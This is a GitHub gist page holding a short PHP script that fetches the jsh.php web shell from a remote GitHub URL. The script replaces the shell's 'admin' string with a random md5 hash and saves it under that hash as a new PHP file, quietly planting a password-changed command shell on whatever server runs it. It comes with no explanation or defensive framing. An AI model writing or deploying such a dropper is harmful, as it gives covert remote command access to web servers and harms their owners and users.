Skip to content

Instantly share code, notes, and snippets.

@ingmarioalberto
Last active March 8, 2024 14:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ingmarioalberto/2b7610c51398e22dcd165a5cf3215129 to your computer and use it in GitHub Desktop.
Save ingmarioalberto/2b7610c51398e22dcd165a5cf3215129 to your computer and use it in GitHub Desktop.
jsh.php michel.php
<?php
$tmp=tempnam(".", "tmp.php");
$mys=tempnam(".", "michel.php");
copy('https://raw.githubusercontent.com/jcubic/jsh.php/master/jsh.php', $tmp);
$o=file_get_contents("$tmp");
$str=rand();$seudorndstr = md5($str);
$O=str_replace("admin", "$seudorndstr",$o);
file_put_contents("{$seudorndstr}.php",$O);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment